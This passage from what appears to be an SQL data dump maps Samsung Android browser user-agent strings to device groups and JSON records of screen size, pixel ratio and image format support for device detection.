Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A405FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A505FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A505FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A505G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A505GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A505U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A507FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A516B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A605FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A605GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A705F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A705FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A705MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A750FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A750G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A750GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A805F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-F700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":879,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G398FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G715FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G965F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G965U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G965U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G970W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G9730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G973U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G973U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G973W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G977B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":676,\"pixelRatio\":3.375,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G981U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G988B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G988U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J400F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J400M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J600GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J610FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J610G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-J810M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M215F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M305M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-M315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 